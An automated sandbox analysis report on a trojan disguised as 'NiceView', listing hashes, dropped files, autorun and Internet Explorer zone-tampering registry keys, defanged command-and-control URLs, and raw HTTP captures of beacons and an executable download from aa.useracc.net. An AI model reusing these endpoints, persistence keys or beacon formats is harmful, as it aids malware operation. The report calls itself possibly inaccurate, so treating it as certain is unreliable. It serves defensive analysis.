Trojan.GenericKD.3582851_6bf770b503
Trojan.MSIL.ShopBot.awp (Kaspersky), Trojan.GenericKD.3582851 (B) (Emsisoft), Trojan.GenericKD.3582851 (AdAware), Trojan.Win32.IEDummy.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 6bf770b503a26a8b7cbcf608639262b2
SHA1: ff45b0ba65f265a385814cdcaf322b920a2e92d2
SHA256: 3d6134b42117f7e9b01b09edd34ed1001ca3085b5486579f0c4d9c78b369a392
SSDeep: 1536:BdVmbP8dJnB8YBA93bBPAafvjLLMkkkkkkqDZDZDZDZDZDZDOGA59QS:BdIYd0YBA931AafIkkkkkkqDZDZDZDZw
Size: 89602 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2016-10-06 16:40:03
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1524
The Trojan injects its code into the following process(es):
devencl.exe:508
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process devencl.exe:508 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@craigslist[2].txt (334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\respond-fork.min[1].js (328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\cl[1].css (2523 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\jquery-ui-clcustom[1].css (338 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\sprite-16px[1].png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\homepage[1].css (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\json2.min[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\homepage[1].css (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jquery-ui-clcustom[1].css (1390 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\homepage-concat.min[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\ukraine.craigslist[1].htm (1117 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\localstorage[1].htm (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@craigslist[1].txt (184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\cl[1].css (276 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\html5shiv.min[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\general-concat.min[1].js (15737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\localstorage[1].html (508 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@craigslist[1].txt (0 bytes)
The process %original file name%.exe:1524 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\devencl.exe (7800 bytes)
Registry activity
The process devencl.exe:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\VB and VBA Program Settings\PiciuReborn\Settings]
"IDON" = "NA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\VB and VBA Program Settings\PiciuReborn\Settings]
"SoftwareID" = "636120405588452500.8683"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\VB and VBA Program Settings\PiciuReborn\Settings]
"PiciuUserAddWork" = "Corleone"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 50 00 12 C1 65 35 CD 50 E5 BB 3D 44 33 C5 38"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"devencl.exe" = "%Documents and Settings%\%current user%\Application Data\Microsoft\devencl.exe"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F DD 2E 19 C5 54 28 35 18 07 8B 89 E6 F3 DB F6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\Microsoft]
"devencl.exe" = "cleanrunning"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
| MD5 | File path |
|---|---|
| b970215efd892348037db082c70ebc91 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\Microsoft\devencl.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name: NiceView
Product Version: 1.0.0.0
Legal Copyright: Copyright (c) 2016
Legal Trademarks:
Original Filename: NiceView.exe
Internal Name: NiceView.exe
File Version: 1.0.0.0
File Description: NiceView
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 17604 | 17920 | 3.97643 | f94018c270bdc3e80223c4d90a1f8961 |
| .sdata | 32768 | 145 | 512 | 1.42965 | e8ed94e2db5b8e93f55d0fbb4f2dc1d2 |
| .rsrc | 40960 | 69136 | 69632 | 2.75976 | 7fb777d1a8fff6374a52c53fbef4bca4 |
| .reloc | 114688 | 12 | 512 | 0.056519 | c65ecb2a31f79a203ad7055218d9a79f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://aa.useracc.net/file/zzz.new | |
| hxxp://aa.useracc.net/o/on.php?74362612 | |
| hxxp://www.l.craigslist.org/ | |
| hxxp://cities.l.craigslist.org/ | |
| hxxp://www.l.craigslist.org/styles/cl.css?v=c27e72792da0a56cfce19f5d49f8838b | |
| hxxp://www.l.craigslist.org/styles/homepage.css?v=eb9fab4ed6146817c2debef8e3632771 | |
| hxxp://www.l.craigslist.org/styles/jquery-ui-clcustom.css?v=31607a98a2cb3fba2c70e3e66ecb4440 | |
| hxxp://www.l.craigslist.org/js/html5shiv.min.js?v=096822b653643ed1af3136947e4ea79a | |
| hxxp://www.l.craigslist.org/js/respond-fork.min.js?v=d7e1cb0d97ee0c0c9d84a7d4f1d03469 | |
| hxxp://cities.l.craigslist.org/styles/cl.css?v=c27e72792da0a56cfce19f5d49f8838b | |
| hxxp://www.l.craigslist.org/js/json2.min.js?v=178d4ad319e0e0b4a451b15e49b71bec | |
| hxxp://cities.l.craigslist.org/styles/homepage.css?v=eb9fab4ed6146817c2debef8e3632771 | |
| hxxp://www.l.craigslist.org/js/general-concat.min.js?v=5ebb6f264ef818c30044ad679ed9876c | |
| hxxp://cities.l.craigslist.org/styles/jquery-ui-clcustom.css?v=31607a98a2cb3fba2c70e3e66ecb4440 | |
| hxxp://www.l.craigslist.org/static/localstorage.html?v=51a29e41f8e978141e4085ed4a77d170 | |
| hxxp://www.l.craigslist.org/js/homepage-concat.min.js?v=69372a831a7625a2650cba9920b95969 | |
| hxxp://aa.useracc.net/o/geo.php | |
| hxxp://www.l.craigslist.org/images/sprite-16px.png | |
| hxxp://www.craigslist.org/styles/homepage.css?v=eb9fab4ed6146817c2debef8e3632771 | |
| hxxp://geo.craigslist.org/ | |
| hxxp://www.craigslist.org/js/homepage-concat.min.js?v=69372a831a7625a2650cba9920b95969 | |
| hxxp://ukraine.craigslist.org/styles/cl.css?v=c27e72792da0a56cfce19f5d49f8838b | |
| hxxp://www.craigslist.org/js/html5shiv.min.js?v=096822b653643ed1af3136947e4ea79a | |
| hxxp://www.craigslist.org/static/localstorage.html?v=51a29e41f8e978141e4085ed4a77d170 | |
| hxxp://geo.cl.com/ | |
| hxxp://www.craigslist.org/js/respond-fork.min.js?v=d7e1cb0d97ee0c0c9d84a7d4f1d03469 | |
| hxxp://ukraine.craigslist.org/ | |
| hxxp://www.craigslist.org/styles/jquery-ui-clcustom.css?v=31607a98a2cb3fba2c70e3e66ecb4440 | |
| hxxp://www.craigslist.org/images/sprite-16px.png | |
| hxxp://ukraine.craigslist.org/styles/homepage.css?v=eb9fab4ed6146817c2debef8e3632771 | |
| hxxp://www.craigslist.org/styles/cl.css?v=c27e72792da0a56cfce19f5d49f8838b | |
| hxxp://www.craigslist.org/js/general-concat.min.js?v=5ebb6f264ef818c30044ad679ed9876c | |
| hxxp://www.craigslist.org/js/json2.min.js?v=178d4ad319e0e0b4a451b15e49b71bec | |
| hxxp://ukraine.craigslist.org/styles/jquery-ui-clcustom.css?v=31607a98a2cb3fba2c70e3e66ecb4440 | |
| digicare.rcs-rds.ro | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
Traffic
POST /o/geo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://aa.useracc.net/o/geo.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Host: aa.useracc.net
Content-Length: 43
Expect: 100-continue
HTTP/1.1 100 Continue
....
a1=aHR0cDovL3VrcmFpbmUuY3JhaWdzbGlzdC5vcmcv
HTTP/1.1 200 OK
Date: Fri, 14 Oct 2016 08:15:37 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.5
Content-Length: 34
Content-Type: text/html
REMOTE_ADDR : 194.242.96.226..Done
POST /o/geo.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://aa.useracc.net/o/geo.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Host: aa.useracc.net
Content-Length: 43
Expect: 100-continue
HTTP/1.1 100 Continue
....
a1=aHR0cDovL3VrcmFpbmUuY3JhaWdzbGlzdC5vcmcv
HTTP/1.1 200 OK
Date: Fri, 14 Oct 2016 08:15:38 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.5
Content-Length: 34
Content-Type: text/html
REMOTE_ADDR : 194.242.96.226..Done..
GET /file/zzz.new HTTP/1.1
Host: aa.useracc.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 14 Oct 2016 08:15:25 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
Last-Modified: Thu, 06 Oct 2016 12:36:13 GMT
ETag: "9400000001a3ff-11e00-53e318a08802e"
Accept-Ranges: bytes
Content-Length: 73216
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
MZ<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ukraine.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo
HTTP/1.1 200 OK
Cache-Control: max-age=3600, public
Last-Modified: Fri, 14 Oct 2016 07:29:34 GMT
Set-Cookie: cl_def_hp=ukraine; path=/; domain=.craigslist.org; expires=Sat, 14-Oct-2017 07:29:34 GMT
Date: Fri, 14 Oct 2016 07:29:34 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 8349
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Fri, 14 Oct 2016 08:29:34 GMT
<<< skipped >>>
GET /styles/cl.css?v=c27e72792da0a56cfce19f5d49f8838b HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://ukraine.craigslist.org/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ukraine.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Thu, 06 Oct 2016 20:47:47 GMT
Date: Thu, 06 Oct 2016 20:47:47 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 9466
Content-Type: text/css; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Sat, 05 Nov 2016 20:47:47 GMT
<<< skipped >>>
GET /styles/homepage.css?v=eb9fab4ed6146817c2debef8e3632771 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://ukraine.craigslist.org/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ukraine.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sun, 09 Oct 2016 17:56:02 GMT
Date: Sun, 09 Oct 2016 17:56:02 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 4135
Content-Type: text/css; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Tue, 08 Nov 2016 17:56:02 GMT
<<< skipped >>>
GET /styles/jquery-ui-clcustom.css?v=31607a98a2cb3fba2c70e3e66ecb4440 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://ukraine.craigslist.org/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ukraine.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sat, 24 Sep 2016 09:57:43 GMT
Date: Sat, 24 Sep 2016 09:57:43 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 7544
Content-Type: text/css; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Mon, 24 Oct 2016 09:57:43 GMT
<<< skipped >>>
POST /o/on.php?74362612 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://aa.useracc.net/o/on.php?74362612
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Host: aa.useracc.net
Content-Length: 104
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
a1=NjM2MTIwNDA1NTg4NDUyNTAwLjg2ODM=&a2=333111&uri=&vers=MTAwNjIwMTZORVc=&uptime=MA==&b1=MQ==&b2=MzJiaXQ=
HTTP/1.1 200 OK
Date: Fri, 14 Oct 2016 08:15:30 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.5
Content-Length: 64
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
REMOTE_ADDR : 194.242.96.226<br>636120405588452500.8683
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: geo.cl.com
Connection: Keep-Alive
HTTP/1.1 301 Found
Location: hXXp://geo.craigslist.org/
GET /styles/cl.css?v=c27e72792da0a56cfce19f5d49f8838b HTTP/1.1
Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Thu, 06 Oct 2016 20:47:47 GMT
Date: Thu, 06 Oct 2016 20:47:47 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 9466
Content-Type: text/css; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Sat, 05 Nov 2016 20:47:47 GMT
<<< skipped >>>
GET /js/html5shiv.min.js?v=096822b653643ed1af3136947e4ea79a HTTP/1.1
Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sun, 25 Sep 2016 08:05:27 GMT
Date: Sun, 25 Sep 2016 08:05:27 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 1288
Content-Type: application/x-javascript; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Tue, 25 Oct 2016 08:05:27 GMT
<<< skipped >>>
GET /js/respond-fork.min.js?v=d7e1cb0d97ee0c0c9d84a7d4f1d03469 HTTP/1.1
Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sun, 25 Sep 2016 08:05:27 GMT
Date: Sun, 25 Sep 2016 08:05:27 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 2200
Content-Type: application/x-javascript; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Tue, 25 Oct 2016 08:05:27 GMT
<<< skipped >>>
GET /js/general-concat.min.js?v=5ebb6f264ef818c30044ad679ed9876c HTTP/1.1
Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Thu, 13 Oct 2016 20:50:15 GMT
Transfer-Encoding: chunked
Date: Thu, 13 Oct 2016 20:50:15 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Sat, 12 Nov 2016 20:50:15 GMT
<<< skipped >>>
GET /js/homepage-concat.min.js?v=69372a831a7625a2650cba9920b95969 HTTP/1.1
Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Tue, 27 Sep 2016 22:51:10 GMT
Date: Tue, 27 Sep 2016 22:51:10 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 1034
Content-Type: application/x-javascript; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Thu, 27 Oct 2016 22:51:10 GMT
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: geo.craigslist.org
Connection: Keep-Alive
HTTP/1.1 302 Found
Last-Modified: Fri, 14 Oct 2016 08:15:49 GMT
Location: //ukraine.craigslist.org/
Date: Fri, 14 Oct 2016 08:15:49 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 21
Content-Type: text/html; charset=iso-8859-1
X-Frame-Options: SAMEORIGIN
Set-Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo;path=/;domain=.craigslist.org;expires=Fri, 01-Jan-2038 00:00:00 GMT
Server: Apache
<<< skipped >>>
GET /styles/homepage.css?v=eb9fab4ed6146817c2debef8e3632771 HTTP/1.1
Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sun, 09 Oct 2016 17:56:02 GMT
Date: Sun, 09 Oct 2016 17:56:02 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 4135
Content-Type: text/css; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Tue, 08 Nov 2016 17:56:02 GMT
<<< skipped >>>
GET /styles/jquery-ui-clcustom.css?v=31607a98a2cb3fba2c70e3e66ecb4440 HTTP/1.1
Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sat, 24 Sep 2016 09:57:43 GMT
